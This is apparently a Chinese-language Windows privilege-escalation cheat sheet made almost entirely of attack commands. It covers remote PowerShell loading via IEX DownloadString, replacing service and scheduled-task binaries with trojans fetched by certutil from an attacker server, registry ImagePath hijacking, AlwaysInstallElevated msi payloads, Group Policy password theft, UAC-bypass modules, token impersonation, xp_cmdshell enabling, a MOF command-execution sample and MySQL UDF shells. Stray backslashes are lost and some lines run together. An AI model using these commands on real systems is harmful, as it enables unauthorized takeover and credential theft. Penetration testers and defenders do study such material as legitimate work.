windows提权看这一篇就够了

#手工查找补丁情况systeminfoWmic qfe get Caption,Description,HotFixID,InstalledOn
#MSF后渗透扫描post/windows/gather/enum_patchespost/multi/recon/local_exploit_suggester
#windows exploit suggesterhttps://github.com/AonCyberLabs/Windows-Exploit-Suggester
#powershell中的sherlock脚本Import-Module C:Sherlock.ps1 #下载ps1脚本，导入模块Find-AllVulns
#Empire内置模块 Empire框架也提供了关于内核溢出漏洞提权的漏洞利用方法usemodule privesc/powerup/allchecksexecute
..........

https://github.com/SecWiki/windows-kernel-exploitshttps://bugs.hacking8.com/tiquan/https://github.com/Heptagrams/Heptagram/tree/master/Windows/Elevationhttps://www.exploit-db.com/https://i.hacking8.com/tiquan/...........

#powerup提供了一些本地提权的方法，可以通过很多实用的脚本来寻找目标机器的windows服务漏洞https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp可直接通过powershell远程加载powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"

#msf 对应的模块为exploit/windows/local/service_permissions  但前提是获得一个会话run exploit/windows/local/service_permissions #自动化提权，回来的的权限就是system

#当工具无法使用时，也可以手工查找，使用Windows内建工具icacls查看服务启动路径中写权限例如：icacls “C:Program Files”icacls “C:Program FilesCommon Files”
#查看指定目录的权限配置情况accesschk.exe -dqv "D:test" -accepteula参数说明：“M”表示修改，“F”代表完全控制，“CI”代表从属容器将继承访问控制项，“OI”代表从属文件将继承访问控制项。
#检查服务 如果是.SERVICE_ALL_ACCESS的意思是我们对“Vulnerable Service”的属性拥有完全控制权accesschk.exe -uwcqv "Authenticated Users" * /accepteulasc qc 服务名   #查看可以完全控制的服务的属性。

#把服务启动的行为（exe或者脚本，com组件..）替换成我们的MSF反弹木马，当服务重启时，就会给我们返回一个system权限的meterpreterset AutoRunScript migrate -f#正常接收到会话后，不久就会自动断开连接，需要开启命令自动迁移进程为什么要自动迁移？这是因为当一个服务在Windows系统中启动后，它必须和服务控制管理器通信，如果没有通信，服务控制管理器会认为出现了错误，并会终止这个进程，我们所有需要做的就是在终止载荷进程之前，将它迁移到其它进程。
#run exploit/windows/local/service_permissionsrun exploit/windows/local/service_permissions
#找到我们具有完全控制权限的服务，修改服务配置执行命令sc config 服务名 binpath = "木马程序.exe"   #INARY_PATH_NAME参数指向了该服务的可执行程序sc stop 服务名sc start 服务名
这里可以用木马程序可以用exe，任意脚本，dll文件等等，具体情况具体分析

#schtask 查询schtasks /query /fo LIST 2>nul
#powershellGet-ScheduledTask

#进行筛选 删除包含/Microsoft/Windows/路径的所有任务Get-ScheduledTask | Select * | ? {($_.TaskPath -notlike "MicrosoftWindows*") -And ($_.Principal.UserId -notlike "*$env:UserName*")} | Format-Table -Property State, Actions, Date, TaskPath, TaskName, @{Name="User";Expression={$_.Principal.userID}}
#分析计划任务  查找行为，比如exe，脚本什么的$task= Get-ScheduledTask -TaskName 计划任务名 ForEach ($triger in $task.Triggers) { echo $triger.Repetition.Interval}
#查找计划任务行为所在目录，低权限用户是否具有可写权限  accesschk.exe  当然也可以用icacls命令accesschk64.exe -accepteula -wv lowuser C:ScheduledTasksTask11111.exe
#直接替换certutil -urlcache -split -f "http://你的vps/1111.exe" C:ScheduledTasksTask11111.exe
#等待计划任务执行

#wmi查找含有漏洞的服务命令wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr/i /v """
#PowerUp脚本https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUppowershell.exe -exec bypass -Command "&{Import-Module .PowerUp.ps1; Invoke-AllChecks}"
##查看指定目录的权限配置情况accesschk.exe -dqv "D:test" -accepteula

#msf攻击模块exploit/windows/local/trusted_service_pathset AutoRunScript migrate -f
#手动攻击我们需要执行的exe根据需要重命名并放置在可写入的有漏洞目录下然后重启服务sc stop service_namesc start service_name

#微软的工具https://www.microsoft.com/en-us/download/search.aspx?q=subinaclsubinacl.exe /key reg "HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesVulnerable Service服务名" /display

#如果我们对注册表有写入权限，就可以修改注册表，使得服务启动时运行我们的恶意程序reg add "HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesVulnerable Service360rp" /t REG_EXPAND_SZ /v ImagePath /d "C:programdataadduser.exe" /f

#PowerUppowershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1;Get-RegistryAlwaysInstallElevated}"
#当然也可以查看注册表键值是否被定义reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevatedreg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

#利用方法,启用AlwaysInstallElevated后，可以通过命令行调用msiexec安装msi文件，msi文件内包含要执行的Payload，Payload将会以System权限执行msiexec /quiet /qn /i muma.msi
#msf   需要一个会话run exploit/windows/local/always_install_elevated

\<DOMAIN>SYSVOL<DOMAIN>Policies

#Powershell获取cpasswordGet-GPPPassword.ps1
#PowerSploit 的 Get-GPPPassword模块 检索通过组策略首选项推送的帐户的明文密码和其他信息。powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1');Get-GPPPassword"Import-Module .Get-GPPPassword.ps1;Get-GPPPasswordkali gpp-decrypt命令破解密码
#Msfrun post/windows/gather/credentials/gpp
#Empireusemodule privesc/gpp

#Msfexploit/windows/local/ask       #弹出UAC确认窗口，点击后获得system权限
exploit/windows/local/bypassuac  #此模块将通过进程注入使用可信任发布者证书绕过Windows UAC，它将生成关闭UAC标志的第二个shell。
exploit/windows/local/bypassuac_injection #此模块将通过进程注入使用可信任的发布者证书绕过Windows UAC。它将生成关闭UAC标志的第二个shell。在普通技术中，该模块使用反射式DLL注入技术并只除去了DLL payload 二进制文件，而不是三个单独的二进制文件。但是，它需要选择正确的体系架构（对于SYSWOW64系统也使用x64）。如果指定exe::custom，应在单独的进程中启动 payload 后调用ExitProcess（）

exploit/windows/local/bypassuac_fodhelper#此模块将通过在当前用户配置单元下劫持注册表中的特殊键并插入将在启动Windows fodhelper.exe应用程序时调用的自定义命令来绕过Windows 10 UAC。它将生成关闭UAC标志的第二个shell。此模块修改注册表项，但在调用payload后将清除该项。该模块不需要payload的体系架构和操作系统匹配。如果指定exe:custom，则应在单独的进程中启动payload后调用ExitProcess（）。
exploit/windows/local/bypassuac_eventvwr#此模块将通过在当前用户配置单元下劫持注册表中的特殊键并插入将在启动Windows事件查看器时调用的自定义命令来绕过Windows UAC。它将生成关闭UAC标志的第二个shell。此模块修改注册表项，但在调用payload后将清除该项。该模块不需要payload的体系架构和操作系统匹配。如果指定EXE ::Custom，则应在单独的进程中启动payload后调用ExitProcess（）
exploit/windows/local/bypassuac_comhijack#此模块将通过在hkcu配置单元中创建COM处理程序注册表项来绕过Windows UAC。当加载某些较高完整性级别进程时，会引用这些注册表项，从而导致进程加载用户控制的DLL,这些DLL包含导致会话权限提升的payload。此模块修改注册表项，但在调用payload后将清除该项,这个模块需要payload的体系架构和操作系统匹配，但是当前的低权限meterpreter会话体系架构中可能不同。如果指定exe:：custom，则应在单独的进程中启动payloa后调用ExitProcess（）。此模块通过目标上的cmd.exe调用目标二进制文件,因此，如果cmd.exe访问受到限制，此模块将无法正常运行。
#PowershellInvoke-PsUACme
#Empireusemodule privesc/bypassuacusemodule privesc/bypassuac_wscript
#csuac-dlluac-token-duplication....

#msf 拿到一个会话use incognito           #进入incognito模块list_tokens -u          #列出令牌Delegation Token：也就是授权令牌，它支持交互式登录(例如可以通过远程桌面登录访问)Impresonation Token：模拟令牌，它是非交互的会话。
这里窃取令牌，主要是窃取进程中的令牌#使用令牌假冒用户impresonate_Token "令牌名"......这里也可以用其他的cs，empire上面的令牌窃取功能模块

https://github.com/breenmachine/RottenPotatoNG/

https://github.com/CCob/SweetPotato

#先获取高权限的数据库用户(sysadmin）查找网站源码数据库链接文件（web.config /conn.asp/aspx config.asp /aspx dbconfig.asp/aspx)等文件，查找数据库链接信息，查找可进入数据库的用户名和密码
理论上，什么用户启的数据库，xp_cmdshell就执行什么权限

#爆破出用户名密码，或者收集到密码....等手段登入数据库，mssql可以外网登录select IS_SRVROLEMEMBER('sysadmin')#查询是否为sysadmin用户，sysadmin执行命令继承了数据库的权限，前提在windows下，数据库(旧版本，新版本默认降权)默认没有被降权,默认就是system权限如果有注入的话，sqlmap --is-dba 也能判断
#然后利用高权限用户执行反弹命令，脚本，木马什么的...默认cmd的组件禁用，必须安装cmd_shell组件EXEC sp_configure 'show advanced options', 1GORECONFIGUREGO EXEC sp_configure 'xp_cmdshell', 1GORECONFIGUREGO
exec master..xp_cmdshell "whoami" --

#mysql语句将恶意mov文件替换nullevt.mof，需先上传select load_file("hacker.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"
mof文件样本#pragma namespace("\\.\root\subscription")instance of __EventFilter as $EventFilter{EventNamespace = "Root\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa "Win32_LocalTime" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject("WScript.Shell")nWSH.run("命令")";};instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};

#首先我们要判断mysql版本，根据不同的版本：mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/mysql版本 > 5.2 ，UDF导出到安装路径MySQLLibPlugin直接查询插件安装目录show variables like %plugin%
#上传udf.dll 将udf.dll导出到插件目录，然后执行sql语句创建用户自定义函数,并利用他执行命令提权create function cmd_shell returns string soname 'udf.dll';#创建函数select cmd_shell('命令');#使用函数drop function cmd_shell; #删除函数

#也可以自动化过程，使用sqlmap自动化上传插件python sqlmap.py -u 'xxxx' --file-write=/lib_mysqludf_sys.so  --file-dest=/usr/lib/mysql/plugin/python sqlmap.py -u 'xxxx' --sql-shell

CVE-2016-6663和CVE-2016-6664,CVE-2016-6663,CVE-2016-6664,CVE-2016-6663,CVE-2016-6664